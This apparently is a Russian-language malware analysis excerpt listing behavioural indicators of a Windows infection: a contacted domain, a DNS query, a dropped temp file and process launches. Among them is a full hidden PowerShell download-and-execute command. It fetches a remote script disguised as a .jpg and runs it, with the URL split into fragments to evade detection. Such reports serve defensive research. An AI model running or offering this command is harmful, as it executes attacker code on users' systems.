Техническая информация
- ht+t+p://giusy+bijo+ux.co+m+/d+sd+d.jp+g
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
- %TEMP%\587172.cvr
- DNS ASK gi###bijoux.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ex byPASS -NOp -windowstyle hidden -c IEX(New-Object System.Net.WebClient).DownloadString('ht'+'t'+'p://giusy'+'bijo'+'ux.co'+'m'+'/d'+'sd'+'d.jp'+'g')' (со скрытым окном)